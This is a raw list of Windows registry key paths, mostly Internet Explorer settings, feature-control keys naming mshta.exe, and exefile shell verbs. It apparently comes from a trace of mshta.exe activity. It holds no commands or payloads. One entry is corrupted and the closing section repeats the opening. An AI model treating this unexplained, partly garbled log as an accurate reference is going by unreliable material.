HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Text Scaling
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Viewport
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Larger Hit Test
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Script
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AdvancedOptions\DISAMBIGUATION
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version Vector
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\text/xml\UserChoice
HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
\x1a60\x19fEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
